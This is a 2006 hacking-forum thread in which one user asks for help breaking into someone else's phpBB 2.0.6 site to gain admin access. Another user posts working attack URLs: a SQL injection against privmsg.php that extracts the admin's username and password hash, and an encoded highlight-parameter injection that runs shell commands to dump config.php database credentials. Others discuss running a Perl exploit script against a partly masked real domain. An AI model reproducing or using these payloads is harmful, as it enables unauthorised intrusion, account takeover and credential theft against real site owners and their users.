|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Hack 2.0.6 |
|
Posted: Sat Apr 22, 2006 5:47 am |
|
|
invisible |
Regular user |
|
|
Joined: Apr 20, 2006 |
Posts: 6 |
|
|
|
|
|
|
|
phpbb 2.0.6
This is the site i m lookinh to hack
it tried replacing cookie method to login as admin
but dint work
any suggestions |
|
Last edited by invisible on Sun Apr 23, 2006 4:34 pm; edited 1 time in total |
|
|
|
Posted: Sat Apr 22, 2006 9:21 pm |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
read the rules, then ask for help again...... |
|
|
|
|
Posted: Sun Apr 23, 2006 12:09 pm |
|
|
invisible |
Regular user |
|
|
Joined: Apr 20, 2006 |
Posts: 6 |
|
|
|
|
|
|
|
sljyro wrote: | read the rules, then ask for help again...... |
dont need to be rude
If you dont have any idea dont share |
|
|
|
|
Posted: Sun Apr 23, 2006 1:27 pm |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
wasn't trying to be rude, but its usual to read the rules first when you join a new forum, they can be found here
if you edit your post, you will find people will help you |
|
|
|
|
Posted: Sun Apr 23, 2006 4:34 pm |
|
|
invisible |
Regular user |
|
|
Joined: Apr 20, 2006 |
Posts: 6 |
|
|
|
|
|
|
|
sljyro wrote: | wasn't trying to be rude, but its usual to read the rules first when you join a new forum, they can be found here
if you edit your post, you will find people will help you |
ok edited |
|
|
|
|
Posted: Sun Apr 23, 2006 6:48 pm |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Mon Apr 24, 2006 7:30 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
heh heres a simple way,
http://site.com/board/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Just change the site url and path to the forum. This will give you a MD% of the user on user_id=2, you need to be registered and logged on it will then "send" you a PM with his MD5. If that doesnt work chances are the board tables are on a different prefex to phpbb_ to find out that use:
http://www.site.com/forum/viewtopic.php?t=1&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20tail%20config.php%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Just change the topic number to the number of a topic you can access. (i.e. change t=1 to t=232). And change the url and forum path.
If 'tail' doesn't work change it to 'cat'.
Shai-tan |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Mon Apr 24, 2006 11:54 am |
|
|
sljyro |
Advanced user |
|
|
Joined: Mar 23, 2006 |
Posts: 53 |
|
|
|
|
|
|
|
i tried this, and it still doesnt work, no PM recieved
could it be that the forum is not a 2.0.6? even though install and changelog files say it is? if so, is there another way of finding out the forum version? |
|
|
|
|
Posted: Mon Apr 24, 2006 7:19 pm |
|
|
invisible |
Regular user |
|
|
Joined: Apr 20, 2006 |
Posts: 6 |
|
|
|
|
|
|
|
both the given exploits not working for me
1)I tried this
saved that pl file
in perl gave this command
perl r57phpbb-poc.pl www.chip-*****.com townsquare 2 2
then it gives exploit failed.I changed the last value "2" to many values.But same result.So i gave up this exploit.What search_id should i put in the end?
in perl file its given as * work only with post #1
what does this mean
2)PM feature is disabled in that bl**dy forum
Thanks for the help |
|
|
|
|
|
|
|
|
Posted: Mon Apr 24, 2006 11:17 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Worked for me many times in the past (back in the day) when it was needed. Chances are the boards have been patched or things have been disabled that need to be enabled but they do work
Well to see if the forum is still 2.0.6 login and try to access admin panel. See what it says. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Tue Apr 25, 2006 5:38 am |
|
|
invisible |
Regular user |
|
|
Joined: Apr 20, 2006 |
Posts: 6 |
|
|
|
|
|
|
|
shai-tan wrote: | Worked for me many times in the past (back in the day) when it was needed. Chances are the boards have been patched or things have been disabled that need to be enabled but they do work
Well to see if the forum is still 2.0.6 login and try to access admin panel. See what it says. |
it says
"Information
You are not authorised to administer this board
Powered by phpBB 2.0.6 ? 2001 phpBB Group '" |
|
|
|
|
Posted: Tue Apr 25, 2006 12:48 pm |
|
|
lazarus |
Beginner |
|
|
Joined: Apr 23, 2006 |
Posts: 3 |
|
|
|
|
|
|
|
But what it is supposed to do? I tried with both "cat" and "tail" and all it displayed was the topic the number of I pasted in the string... Should it display something? |
|
|
|
|
|
|
|
|
Posted: Tue Apr 25, 2006 9:22 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
heh that should work on any forum from 2.0.10 down. Its the highlighter issue without having to use a pl script. Its suppossed to grab the database information from config.php |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|